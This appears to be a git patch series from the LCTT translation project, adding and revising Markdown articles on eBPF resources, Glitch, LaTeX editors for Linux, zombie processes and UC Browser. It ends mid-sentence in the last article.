from an iproute2 version equivalent to the kernel in use. +* 使用 tc 去加载一个程序,确保你使用了一个与使用中的内核版本等价的 iproute2 中的 tc 二进制文件。 -* To load a program with bcc, make sure you have bcc installed on the system (just downloading the sources to run the Python script is not enough). +* 使用 bcc 去加载一个程序,确保在你的系统上安装了 bcc(仅下载源代码去运行 Python 脚本是不够的)。 -* With tc, if the BPF program does not return the expected values, check that you called it in the correct fashion: filter, or action, or filter with “direct-action” mode. +* 使用 tc,如果 BPF 程序不能返回一个预期值,检查调用它的方式:过滤器、或者动作、或者使用 “直接传动” 模式的过滤器。 -* With tc still, note that actions cannot be attached directly to qdiscs or interfaces without the use of a filter. +* 静态使用 tc,注意不使用过滤器,动作不会直接附加到 qdiscs 或者接口。 -* The errors thrown by the in-kernel verifier may be hard to interpret. [The kernel documentation][129]may help, so may [the reference guide][130] or, as a last resort, the source code (see above) (good luck!). For this kind of errors it is also important to keep in mind that the verifier  _does not run_  the program. If you get an error about an invalid memory access or about uninitialized data, it does not mean that these problems actually occurred (or sometimes, that they can possibly occur at all). It means that your program is written in such a way that the verifier estimates that such errors could happen, and therefore it rejects the program. +* 通过内核校验器抛出错误到解析器可能很难。[内核文档][129]或许可以提供帮助,因此,可以 [参考指南][130] 或者,万不得一的情况下,可以去看源代码(祝你好运!)。记住,校验器 _不运行_ 程序,对于这种类型的错误,它也是非常重要的。如果你得到一个关于无效内存访问或者关于未初始化的数据的错误,它并不意味着那些问题真实发生了(或者有时候,它们完全有可能发生)。它意味着你的程序是以校验器预计可能发生错误的方式写的,并且因此而拒绝这个程序。 -* Note that `tc` tool has a verbose mode, and that it works well with BPF: try appending `verbose`at the end of your command line. +* 注意 `tc` 工具有一个 `verbose` 模式,它与 BPF 一起工作的很好:在你的命令行尾部尝试追加一个 `verbose`。 -* bcc also has verbose options: the `BPF` class has a `debug` argument that can take any combination of the three flags `DEBUG_LLVM_IR`, `DEBUG_BPF` and `DEBUG_PREPROCESSOR` (see details in [the source file][131]). It even embeds [some facilities to print output messages][132] for debugging the code. +* bcc 也有一个 verbose 选项:`BPF` 类有一个 `debug` 参数,它可以带 `DEBUG_LLVM_IR`、`DEBUG_BPF` 和 `DEBUG_PREPROCESSOR` 三个标志中任何组合(详细情况在 [源文件][131]中)。 为调试代码,它甚至嵌入了 [一些条件去打印输出代码][132]。 -* LLVM v4.0+ [embeds a disassembler][133] for eBPF programs. So if you compile your program with clang, adding the `-g` flag for compiling enables you to later dump your program in the rather human-friendly format used by the kernel verifier. To proceed to the dump, use: +* LLVM v4.0+ 为 eBPF 程序 [嵌入一个反汇编器][133]。因此,如果你用 clang 编译你的程序,在编译时添加 `-g` 标志允许你通过内核校验器去以人类可读的格式去转储你的程序。处理转储文件,使用: ``` $ llvm-objdump -S -no-show-raw-insn bpf_program.o ``` -* Working with maps? You want to have a look at [bpf-map][134], a very userful tool in Go created for the Cilium project, that can be used to dump the contents of kernel eBPF maps. There also exists [a clone][135] in Rust. +* 使用映射工作?你想去看 [bpf-map][134],一个为 Cilium 项目而用 Go 创建的非常有用的工具,它可以用于去转储内核中 eBPF 映射的内容。那里也有在 Rust 中的 [一个克隆][135]。 -* There is an old [`bpf` tag on **StackOverflow**][136], but as of this writing it has been hardly used—ever (and there is nearly nothing related to the new eBPF version). If you are a reader from the Future though, you may want to check whether there has been more activity on this side. +* 那里有一个旧的 [在 **StackOverflow** 上的 `bpf` 标签][136],但是,在这篇文章中它一直没有被使用过(并且那里几乎没有与新的 eBPF 相关的东西)。如果你是一位来自未来的阅读者,你可能想去看看在这方面是否有更多的活动。 ![](https://qmonnet.github.io/whirl-offload/img/icons/zoomin.svg) -### And still more! +### 更多! -* In case you would like to easily **test XDP**, there is [a Vagrant setup][137] available. You can also **test bcc**[in a Docker container][138]. +* 如果你想很容易地去 **测试 XDP**,那是 [一个 Vagrant 设置][137] 可以使用。你也可以 **测试 bcc**[在一个 Docker 容器中][138]。 -* Wondering where the **development and activities** around BPF occur? Well, the kernel patches always end up [on the netdev mailing list][139] (related to the Linux kernel networking stack development): search for “BPF” or “XDP” keywords. Since April 2017, there is also [a mailing list specially dedicated to XDP programming][140] (both for architecture or for asking for help). Many discussions and debates also occur [on the IO Visor mailing list][141], since BPF is at the heart of the project. If you only want to keep informed from time to time, there is also an [@IOVisor Twitter account][142]. +* 想知道围绕 BPF 的 **开发和活动** 在哪里吗?好吧,内核补丁总是结束于 [netdev 上的邮件列表][139](相关 Linux 内核的网络栈开发):以关键字 “BPF” 或者 “XDP” 来搜索。自 2017 年 4 月开始,那里也有 [一个专门用于 XDP 编程的邮件列表][140](是为了架构或者寻求帮助)。[在 IO Visor 的邮件列表上][141]也有许多的讨论和辨论,因为 BPF 是一个重要的项目。如果你只是想随时了解情况,那里也有一个 [@IOVisor Twitter 帐户][142]。 -And come back on this blog from time to time to see if they are new articles [about BPF][192]! +我经常会回到这篇博客中,来看一看 [关于 BPF][192] 有没有新的文章! - _Special thanks to Daniel Borkmann for the numerous [additional documents][154] he pointed to me so that I could complete this collection._ +_特别感谢 Daniel Borkmann 指引我找到了许多的 [附加的文档][154],因此我才完成了这个合集。_ -------------------------------------------------------------------------------- via: https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/ 作者:[Quentin Monnet ][a] -译者:[译者ID](https://github.com/译者ID) +译者:[qhwdw](https://github.com/qhwdw) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 @@ -529,7 +529,7 @@ via: https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/ [10]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#from-bcc-set-of-tools [11]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#manual-pages [12]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#bpf-code-in-the-kernel -[13]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#xdp-hooks-code +[13]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#xdp-·s-code [14]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#bpf-logic-in-bcc [15]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#code-to-manage-bpf-with-tc [16]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#bpf-utilities From 1ba6dd22898654328354d73a559a3ddbaa8c6a43 Mon Sep 17 00:00:00 2001 From: wxy Date: Tue, 12 Dec 2017 17:00:09 +0800 Subject: [PATCH 0510/1627] PRF&PUB:20171113 Glitch write fun small web projects instantly.md @geekpi --- ... write fun small web projects instantly.md | 25 ++++++++----------- 1 file changed, 11 insertions(+), 14 deletions(-) rename {translated/tech => published}/20171113 Glitch write fun small web projects instantly.md (64%) diff --git a/translated/tech/20171113 Glitch write fun small web projects instantly.md b/published/20171113 Glitch write fun small web projects instantly.md similarity index 64% rename from translated/tech/20171113 Glitch write fun small web projects instantly.md rename to published/20171113 Glitch write fun small web projects instantly.md index fde7d7f880..7e041f0e73 100644 --- a/translated/tech/20171113 Glitch write fun small web projects instantly.md +++ b/published/20171113 Glitch write fun small web projects instantly.md @@ -1,19 +1,18 @@ -Glitch:立即写出有趣的小型网站项目 +Glitch:可以让你立即写出有趣的小型网站 ============================================================ -我刚写了一篇关于 Jupyter Notebooks 是一个有趣的交互式写 Python 代码的方式。这让我想起我最近学习了 Glitch,这个我同样喜爱!我构建了一个小的程序来用于[关闭转发 twitter][2]。因此有了这篇文章! +我刚写了一篇关于 Jupyter Notebooks 的文章,它是一个有趣的交互式写 Python 代码的方式。这让我想起我最近学习了 Glitch,这个我同样喜爱!我构建了一个小的程序来用于[关闭转发 twitter][2]。因此有了这篇文章! -[Glitch][3] 是一个简单的构建 Javascript web 程序的方式(javascript 后端、javascript 前端) +[Glitch][3] 是一个简单的构建 Javascript web 程序的方式(javascript 后端、javascript 前端)。 -关于 glitch 有趣的事有: +关于 glitch 有趣的地方有: 1. 你在他们的网站输入 Javascript 代码 - 2. 只要输入了任何代码,它会自动用你的新代码重载你的网站。你甚至不必保存!它会自动保存。 所以这就像 Heroku,但更神奇!像这样的编码(你输入代码,代码立即在公共网络上运行)对我而言感觉很**有趣**。 -这有点像 ssh 登录服务器,编辑服务器上的 PHP/HTML 代码,并让它立即可用,这也是我所喜爱的。现在我们有了“更好的部署实践”,而不是“编辑代码,它立即出现在互联网上”,但我们并不是在谈论严肃的开发实践,而是在讨论编写微型程序的乐趣。 +这有点像用 ssh 登录服务器,编辑服务器上的 PHP/HTML 代码,它立即就可用了,而这也是我所喜爱的方式。虽然现在我们有了“更好的部署实践”,而不是“编辑代码,让它立即出现在互联网上”,但我们并不是在谈论严肃的开发实践,而是在讨论编写微型程序的乐趣。 ### Glitch 有很棒的示例应用程序 @@ -22,18 +21,16 @@ Glitch 似乎是学习编程的好方式! 比如,这有一个太空侵略者游戏(由 [Mary Rose Cook][4] 编写):[https://space-invaders.glitch.me/][5]。我喜欢的是我只需要点击几下。 1. 点击 “remix this” - 2. 开始编辑代码使箱子变成橘色而不是黑色 - 3. 制作我自己太空侵略者游戏!我的在这:[http://julias-space-invaders.glitch.me/][1]。(我只做了很小的更改使其变成橘色,没什么神奇的) 他们有大量的示例程序,你可以从中启动 - 例如[机器人][6]、[游戏][7]等等。 ### 实际有用的非常好的程序:tweetstorms -我学习 Glitch 的方式是从这个程序:[https://tweetstorms.glitch.me/][8],它会向你展示给定用户的 tweetstorm。 +我学习 Glitch 的方式是从这个程序开始的:[https://tweetstorms.glitch.me/][8],它会向你展示给定用户的推特云。 -比如,你可以在 [https://tweetstorms.glitch.me/sarahmei][10] 看到 [@sarahmei][9] 的 tweetstorm(她发布了很多好的 tweetstorm!)。 +比如,你可以在 [https://tweetstorms.glitch.me/sarahmei][10] 看到 [@sarahmei][9] 的推特云(她发布了很多好的 tweetstorm!)。 ### 我的 Glitch 程序: 关闭转推 @@ -41,11 +38,11 @@ Glitch 似乎是学习编程的好方式! 我喜欢我不必设置一个本地开发环境,我可以直接开始输入然后开始! -Glitch 只支持 Javascript,我不非常了解 Javascript(我之前从没写过一个 Node 程序),所以代码不是很好。但是编写它很愉快 - 能够输入并立即看到我的代码运行是令人愉快的。这是我的项目:[https://turn-off-retweets.glitch.me/][11]。 +Glitch 只支持 Javascript,我不是非常了解 Javascript(我之前从没写过一个 Node 程序),所以代码不是很好。但是编写它很愉快 - 能够输入并立即看到我的代码运行是令人愉快的。这是我的项目:[https://turn-off-retweets.glitch.me/][11]。 ### 就是这些! -使用 Glitch 感觉真的很有趣和民主。通常情况下,如果我想 fork 某人的 Web 项目,并做出更改,我不会这样做 - 我必须 fork,找一个托管,设置本地开发环境或者 Heroku 或其他,安装依赖项等。我认为像安装 node.js 依赖关系这样的任务过去很有趣,就像“我正在学习新东西很酷”,现在我觉得它们很乏味。 +使用 Glitch 感觉真的很有趣和民主。通常情况下,如果我想 fork 某人的 Web 项目,并做出更改,我不会这样做 - 我必须 fork,找一个托管,设置本地开发环境或者 Heroku 或其他,安装依赖项等。我认为像安装 node.js 依赖关系这样的任务在过去很有趣,就像“我正在学习新东西很酷”,但现在我觉得它们很乏味。 所以我喜欢只需点击 “remix this!” 并立即在互联网上能有我的版本。 @@ -53,9 +50,9 @@ Glitch 只支持 Javascript,我不非常了解 Javascript(我之前从没写 via: https://jvns.ca/blog/2017/11/13/glitch--write-small-web-projects-easily/ -作者:[Julia Evans ][a] +作者:[Julia Evans][a] 译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 089d0517387a08727d4d6e33201731038cb4fa4d Mon Sep 17 00:00:00 2001 From: qhwdw Date: Tue, 12 Dec 2017 17:08:56 +0800 Subject: [PATCH 0511/1627] Translating by qhwdw --- ...ny syscall into an event Introducing eBPF Kernel probes.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/sources/tech/20160330 How to turn any syscall into an event Introducing eBPF Kernel probes.md b/sources/tech/20160330 How to turn any syscall into an event Introducing eBPF Kernel probes.md index a53270f2d7..7a4ac2efbe 100644 --- a/sources/tech/20160330 How to turn any syscall into an event Introducing eBPF Kernel probes.md +++ b/sources/tech/20160330 How to turn any syscall into an event Introducing eBPF Kernel probes.md @@ -1,4 +1,4 @@ -How to turn any syscall into an event: Introducing eBPF Kernel probes +Translating by qhwdw How to turn any syscall into an event: Introducing eBPF Kernel probes ============================================================ @@ -359,3 +359,5 @@ via: https://blog.yadutaf.fr/2016/03/30/turn-any-syscall-into-event-introducing- [15]:http://lxr.free-electrons.com/source/kernel/trace/bpf_trace.c#L86 [16]:https://github.com/iovisor/bcc/blob/master/tools/solisten.py [17]:http://www.brendangregg.com/blog/2015-05-15/ebpf-one-small-step.html + + From c22adbd65816fd34030f7b14f7b7dd1d5ba67aa8 Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 12 Dec 2017 18:26:57 +0800 Subject: [PATCH 0512/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...0171119 10 Best LaTeX Editors For Linux.md | 264 ++++++++++++++++++ 1 file changed, 264 insertions(+) create mode 100644 sources/tech/20171119 10 Best LaTeX Editors For Linux.md diff --git a/sources/tech/20171119 10 Best LaTeX Editors For Linux.md b/sources/tech/20171119 10 Best LaTeX Editors For Linux.md new file mode 100644 index 0000000000..467257a68d --- /dev/null +++ b/sources/tech/20171119 10 Best LaTeX Editors For Linux.md @@ -0,0 +1,264 @@ +10 Best LaTeX Editors For Linux +====== +**Brief: Once you get over the learning curve, there is nothing like LaTex. +Here are the best LaTex editors for Linux and other systems.** + +## What is LaTeX? + +[LaTeX][1] is a document preparation system. Unlike plain text editor, you +can't just write a plain text using LaTeX editors. Here, you will have to +utilize LaTeX commands in order to manage the content of the document. + +![LaTex Sample][2]![LaTex Sample][3] + +LaTex Editors are generally used to publish scientific research documents or +books for academic purposes. Most importantly, LaText editors come handy while +dealing with a document containing complex Mathematical notations. Surely, +LaTeX editors are fun to use. But, not that useful unless you have specific +needs for a document. + +## Why should you use LaTex? + +Well, just like I previously mentioned, LaTeX editors are meant for specific +purposes. You do not need to be a geek head in order to figure out the way to +use LaTeX editors but it is not a productive solution for users who deal with +basic text editors. + +If you are looking to craft a document but you are not interested in spending +time formatting the text, then LaTeX editors should be the one you should go +for. With LaTeX editors, you just have to specify the type of document, and +the text font and sizes will be taken care of accordingly. No wonder it is +considered one of the [best open source tools for writers][4]. + +Do note that it isn't something automated, you will have to first learn LaTeX +commands to let the editor handle the text formatting with precision. + +## 10 Of The Best LaTeX Editors For Linux + +Just for information, the list is not in any specific order. Editor at number +three is not better than the editor at number seven. + +### 1\. Lyx + +![][2] + +![][5] + +Lyx is an open source LaTeX Editor. In other words, it is one of the best +document processors available on the web.LyX helps you focus on the structure +of the write-up, just as every LaTeX editor should and lets you forget about +the word formatting. LyX would manage whatsoever depending on the type of +document specified. You get to control a lot of stuff while you have it +installed. The margins, headers/footers, spacing/indents, tables, and so on. + +If you are into crafting scientific documents, research thesis, or similar, +you will be delighted to experience Lyx's formula editor which should be a +charm to use. LyX also includes a set of tutorials to get started without much +of a hassle. + +[Lyx][6] + +### 2\. Texmaker + +![][2] + +![][7] + +Texmaker is considered to be one of the best LaTeX editors for GNOME desktop +environment. It presents a great user interface which results in a good user +experience. It is also crowned to be one among the most useful LaTeX editor +there is.If you perform PDF conversions often, you will find TeXmaker to be +relatively faster than other LaTeX editors. You can take a look at a preview +of what the final document would look like while you write. Also, one could +observe the symbols being easy to reach when needed. + +Texmaker also offers an extensive support for hotkeys configuration. Why not +give it a try? + +[Texmaker][8] + +### 3\. TeXstudio + +![][2] + +![][9] + +If you want a LaTeX editor which offers you a decent level of customizability +along with an easy-to-use interface, then TeXstudio would be the perfect one +to have installed. The UI is surely very simple but not clumsy. TeXstudio lets +you highlight syntax, comes with an integrated viewer, lets you check the +references and also bundles some other assistant tools. + +It also supports some cool features like auto-completion, link overlay, +bookmarks, multi-cursors, and so on - which makes writing a LaTeX document +easier than ever before. + +TeXstudio is actively maintained, which makes it a compelling choice for both +novice users and advanced writers. + +[TeXstudio][10] + +### 4\. Gummi + +![][2] + +![][11] + +Gummi is a very simple LaTeX editor based on the GTK+ toolkit. Well, you may +not find a lot of fancy options here but if you are just starting out - Gummi +will be our recommendation.It supports exporting the documents to PDF format, +lets you highlight syntax, and helps you with some basic error checking +functionalities. Though Gummi isn't actively maintained via GitHub it works +just fine. + +[Gummi][12] + +### 5\. TeXpen + +![][2] + +![][13] + +TeXpen is yet another simplified tool to go with. You get the auto-completion +functionality with this LaTeX editor. However, you may not find the user +interface impressive. If you do not mind the UI, but want a super easy LaTeX +editor, TeXpen could fulfill that wish for you.Also, TeXpen lets you +correct/improve the English grammar and expressions used in the document. + +[TeXpen][14] + +### 6\. ShareLaTeX + +![][2] + +![][15] + +ShareLaTeX is an online LaTeX editor. If you want someone (or a group of +people) to collaborate on documents you are working on, this is what you need. + +It offers a free plan along with several paid packages. Even the students of +Harvard University & Oxford University utilize this for their projects. With +the free plan, you get the ability to add one collaborator. + +The paid packages let you sync the documents on GitHub and Dropbox along with +the ability to record the full document history. You can choose to have +multiple collaborators as per your plan. For students, there's a separate +pricing plan available. + +[ShareLaTeX][16] + +### 7\. Overleaf + +![][2] + +![][17] + +Overleaf is yet another online LaTeX editor. Similar to ShareLaTeX, it offers +separate pricing plans for professionals and students. It also includes a free +plan where you can sync with GitHub, check your revision history, and add +multiple collaborators. + +There's a limit on the number of files you can create per project - so it +could bother if you are a professional working with LaTeX documents most of +the time. + +[Overleaf][18] + +### 8\. Authorea + +![][2] + +![][19] + +Authorea is a wonderful online LaTeX editor. However, it is not the best out +there - when considering the pricing plans. For free, it offers just 100 MB of +data upload limit and 1 private document at a time. The paid plans offer you +more perks but it may not be the cheapest from the lot.The only reason you +should choose Authorea is the user interface. If you love to work with a tool +offering an impressive user interface, there's no looking back. + +[Authorea][20] + +### 9\. Papeeria + +![][2] + +![][21] + +Papeeria is the cheapest LaTeX editor you can find on the Internet - +considering it is as reliable as the others. You do not get private projects +if you want to utilize it for free. But, if you prefer public projects it lets +you work on an unlimited number of projects with numerous collaborators. It +features a pretty simple plot builder and includes Git sync for no additional +cost.If you opt for the paid plan, it will empower you with the ability to +work on 10 private projects. + +[Papeeria][22] + +### 10\. Kile + +![Kile LaTeX editor][2] + +![Kile LaTeX editor][23] + +Last entry in our list of best LaTeX editor is Kile. Some people swear by +Kile. Primarily because of the features it provides. + +Kile is more than just an editor. It is an IDE tool like Eclipse that provides +a complete environment to work on documents and projects. Apart from quick +compilation and preview, you get features like auto-completion of commands, +insert citations, organize document in chapters etc. You really have to use +Kile to realize its true potential. + +Kile is available for Linux and Windows. + +[Kile][24] + +### Wrapping Up + +So, there go our recommendations for the LaTeX editors you should utilize on +Ubuntu/Linux. + +There are chances that we might have missed some interesting LaTeX editors +available for Linux. If you happen to know about any, let us know down in the +comments below. + + + + + +-------------------------------------------------------------------------------- + +via: https://itsfoss.com/latex-editors-linux/ + +作者:[Ankush Das][a] +译者:[翻译者ID](https://github.com/翻译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://itsfoss.com/author/ankush/ +[1]:https://www.latex-project.org/ +[2]:data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs= +[3]:https://itsfoss.com/wp-content/uploads/2017/11/latex-sample-example.jpeg +[4]:https://itsfoss.com/open-source-tools-writers/ +[5]:https://itsfoss.com/wp-content/uploads/2017/10/lyx_latex_editor.jpg +[6]:https://www.lyx.org/ +[7]:https://itsfoss.com/wp-content/uploads/2017/10/texmaker_latex_editor.jpg +[8]:http://www.xm1math.net/texmaker/ +[9]:https://itsfoss.com/wp-content/uploads/2017/10/tex_studio_latex_editor.jpg +[10]:https://www.texstudio.org/ +[11]:https://itsfoss.com/wp-content/uploads/2017/10/gummi_latex_editor.jpg +[12]:https://github.com/alexandervdm/gummi +[13]:https://itsfoss.com/wp-content/uploads/2017/10/texpen_latex_editor.jpg +[14]:https://sourceforge.net/projects/texpen/ +[15]:https://itsfoss.com/wp-content/uploads/2017/10/sharelatex.jpg +[16]:https://www.sharelatex.com/ +[17]:https://itsfoss.com/wp-content/uploads/2017/10/overleaf.jpg +[18]:https://www.overleaf.com/ +[19]:https://itsfoss.com/wp-content/uploads/2017/10/authorea.jpg +[20]:https://www.authorea.com/ +[21]:https://itsfoss.com/wp-content/uploads/2017/10/papeeria_latex_editor.jpg +[22]:https://www.papeeria.com/ +[23]:https://itsfoss.com/wp-content/uploads/2017/11/kile-latex-800x621.png +[24]:https://kile.sourceforge.io/ From 3bb0b0593ddb7ad919ab91796a8aa478a2c9d1bc Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 12 Dec 2017 22:38:54 +0800 Subject: [PATCH 0513/1627] =?UTF-8?q?=E7=BF=BB=E8=AF=91=E5=AE=8C=E6=AF=95?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...e Zombie Processes And How To Find & Kill Zombie Processes-.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {sources => translated}/tech/20171211 What Are Zombie Processes And How To Find & Kill Zombie Processes-.md (100%) diff --git a/sources/tech/20171211 What Are Zombie Processes And How To Find & Kill Zombie Processes-.md b/translated/tech/20171211 What Are Zombie Processes And How To Find & Kill Zombie Processes-.md similarity index 100% rename from sources/tech/20171211 What Are Zombie Processes And How To Find & Kill Zombie Processes-.md rename to translated/tech/20171211 What Are Zombie Processes And How To Find & Kill Zombie Processes-.md From e1fa5c2c284bd3d0b4af89b5dbdad32a117c1fe8 Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 12 Dec 2017 22:39:44 +0800 Subject: [PATCH 0514/1627] =?UTF-8?q?update=20at=202017=E5=B9=B4=2012?= =?UTF-8?q?=E6=9C=88=2012=E6=97=A5=20=E6=98=9F=E6=9C=9F=E4=BA=8C=2022:39:4?= =?UTF-8?q?4=20CST?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...nd How To Find & Kill Zombie Processes-.md | 76 ++++++++----------- 1 file changed, 32 insertions(+), 44 deletions(-) diff --git a/translated/tech/20171211 What Are Zombie Processes And How To Find & Kill Zombie Processes-.md b/translated/tech/20171211 What Are Zombie Processes And How To Find & Kill Zombie Processes-.md index a0d01b195a..79e13fcc01 100644 --- a/translated/tech/20171211 What Are Zombie Processes And How To Find & Kill Zombie Processes-.md +++ b/translated/tech/20171211 What Are Zombie Processes And How To Find & Kill Zombie Processes-.md @@ -1,79 +1,67 @@ -translating by lujun9972 -What Are Zombie Processes And How To Find & Kill Zombie Processes? +什么是僵尸进程以及如何找到并杀掉僵尸进程? ====== - [![What Are Zombie Processes And How To Find & Kill Zombie Processes?](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/what-are-the-zombie-processes_orig.jpg)][1] + [![What Are Zombie Processes And How To Find & Kill Zombie Processes?](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/what-are-the-zombie-processes_orig.jpg)][1] -If you are a regular Linux user, you must have encountered the term `Zombie Processes`. So what are the Zombie Processes? How do they get created? Are they harmful to the system? How do I kill these processes? Keep reading for the answers to all these questions. +如果你经常使用 Linux,你应该遇到这个术语 `僵尸进程`。 那么什么是僵尸进程? 它们是怎么产生的? 他们是否对系统有害? 我要怎样杀掉这些进程? 下面将会回答这些问题。 -### What are Zombie Processes? +### 什么是僵尸进程? -So we all know how processes work. We launch a program, start our task & once our task is over, we end that process. Once the process has ended, it has to be removed from the processes table. +我们都知道进程的工作原理。我们启动一个程序,开始我们的任务,然后等任务结束了,我们就停止这个进程。 进程停止后, 该进程就会从进程表中移除。 -​ +你可以通过 `System-Monitor` 查看当前进程。 -You can see the current processes in the ‘System-Monitor’. + [![](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/linux-check-zombie-processes_orig.jpg)][2] - [![Replace the pid with the id of the parent process so that the parent process will remove all the child processes that are dead and completed. Imagine it Like this : “You find a dead body in the middle of the road, you call the dead body’s family and they take that body away from the road.” But a lot of programs are not programmed well enough to remove these child zombies because if they were, you wouldn’t have those zombies in the first place. So the only thing guaranteed to remove Child Zombies is killing the parent.](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/linux-check-zombie-processes_orig.jpg)][2] +但是,有时候有些程序即使执行完了也依然留在进程表中。 -But, sometimes some of these processes stay in the processes table even after they have completed execution. +那么,这些完成了生命周期但却依然留在进程表中的进程,我们称之为 `僵尸进程`。 -​ +### 他们是如何产生的? -So these processes that have completed their life of execution but still exist in the processes table are called ‘Zombie Processes’. +当你运行一个程序时,它会产生一个父进程以及很多子进程。 所有这些子进程都会消耗内核分配给他们的内存和 CPU 资源。 -### And How Exactly do they get Created? +这些子进程完成执行后会发送一个 Exit 信号然后死掉。这个 Exit 信号需要被父进程所读取。父进程需要随后调用 `wait` 命令来读取子进程的退出状态并将子进程从进程表中移除。 -Whenever we run a program it creates a parent process and a lot of child processes. All of these child processes use resources such as memory and CPU allocated to them by the kernel. +若父进程正确第读取了子进程的 Exit 信号,则子进程会从进程表中删掉。 -​ +但若父进程未能读取到子进程的 Exit 信号,则这个子进程虽然完成执行处于死亡的状态,但也不会从进程表中删掉。 -Once these child processes have finished executing they send an Exit call and die. This Exit call has to be read by the parent process which later calls the wait command to read the exit_status of the child process so that the child process can be removed from the processes table. +### 僵尸进程对系统有害吗 Are Zombie processes harmful to the System? -If the Parent reads the Exit call correctly sent by the Child Process, the process is removed from the processes table. +**不会**。由于僵尸进程并不做任何事情, 不会使用任何资源也不会影响其他进程, 因此存在僵尸进程也没什么坏处。 不过由于进程表中的退出状态以及其他一些进程信息也是存储在内存中的,因此存在太多僵尸进程有时也会是一些问题。 -But, if the parent fails to read the exit call from the child process, the child process which has already finished its execution and is now dead will not be removed from the processes table. +**你可以想象成这样:** -### Are Zombie processes harmful to the System? +“你是一家建筑公司的老板。你每天根据工人们的工作量来支付工资。 有一个工人每天来到施工现场,就坐在那里, 你不用付钱, 它也不做任何工作。 他只是每天都来然后呆坐在那,仅此而已!” -**No. ** +这个工人就是僵尸进程的一个活生生的例子。**但是**, 如果你有很多僵尸工人, 你的建设工地就会很拥堵从而让那些正常的工人难以工作。 -Since zombie process is not doing any work, not using any resources or affecting any other process, there is no harm in having a zombie process. But since the exit_status and other process information from the process table are stored in the RAM, having too many Zombie processes can sometimes be an issue. +### 那么如何找出僵尸进程呢? - **_Imagine it Like this :_** - -“ - - _You are the owner of a construction company. You pay daily wages to all your workers depending upon how they work. _ _A worker comes to the construction site every day, just sits there, you don’t have to pay him, he doesn’t do any work. _ _He just comes every day and sits, that’s it !”_ - -Such a worker is the living example of a zombie process. - -**But,** - -if you have a lot of zombie workers, your construction site will get crowded and it might get difficult for the people that are actually working. - -### So how to find Zombie Processes? - -Fire up a terminal and type the following command - +打开终端并输入下面命令: +``` ps aux | grep Z +``` -You will now get details of all zombie processes in the processes table. +会列出进程表中所有僵尸进程的详细内容。 -### How to kill Zombie processes? +### 如何杀掉僵尸进程? -Normally we kill processes with the SIGKILL command but zombie processes are already dead. You Cannot kill something that is already dead. So what you do is you type this command - +正常情况下我们可以用 `SIGKILL` 信号来杀死进程,但是僵尸进程已经死了, 你不能杀死已经死掉的东西。 因此你需要输入的命令应该是 +``` kill -s SIGCHLD pid +``` -​Replace the pid with the id of the parent process so that the parent process will remove all the child processes that are dead and completed. +将这里的 pid 替换成父进程的 id,这样父进程就会删除所有以及完成并死掉的子进程了。 - **_Imagine it Like this :_** +**你可以把它想象成:** -“ +"你在道路中间发现一具尸体,于是你联系了死者的家属,随后他们就会将尸体带离道路了。" - _You find a dead body in the middle of the road, you call the dead body’s family and they take that body away from the road.”_ +不过许多程序写的不是那么好,无法删掉这些子僵尸(否则你一开始也见不到这些僵尸了)。 因此确保删除子僵尸的唯一方法就是杀掉它们的父进程。 -But a lot of programs are not programmed well enough to remove these child zombies because if they were, you wouldn’t have those zombies in the first place. So the only thing guaranteed to remove Child Zombies is killing the parent. -------------------------------------------------------------------------------- From 71631b8e773634b80fef0374a0feecb42bb68b08 Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 12 Dec 2017 22:48:19 +0800 Subject: [PATCH 0515/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20The=20Biggest?= =?UTF-8?q?=20Problems=20With=20UC=20Browser?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...08 The Biggest Problems With UC Browser.md | 93 +++++++++++++++++++ 1 file changed, 93 insertions(+) create mode 100644 sources/tech/20171208 The Biggest Problems With UC Browser.md diff --git a/sources/tech/20171208 The Biggest Problems With UC Browser.md b/sources/tech/20171208 The Biggest Problems With UC Browser.md new file mode 100644 index 0000000000..0a18d1b802 --- /dev/null +++ b/sources/tech/20171208 The Biggest Problems With UC Browser.md @@ -0,0 +1,93 @@ +The Biggest Problems With UC Browser +====== +Before we even begin talking about the cons, I want to establish the fact that +I have been a devoted UC Browser user for the past 3 years. I really love the +download speeds I get, the ultra-sleek user interface and eye-catching icons +used for tools. I was a Chrome for Android user in the beginning but I +migrated to UC on a friend's 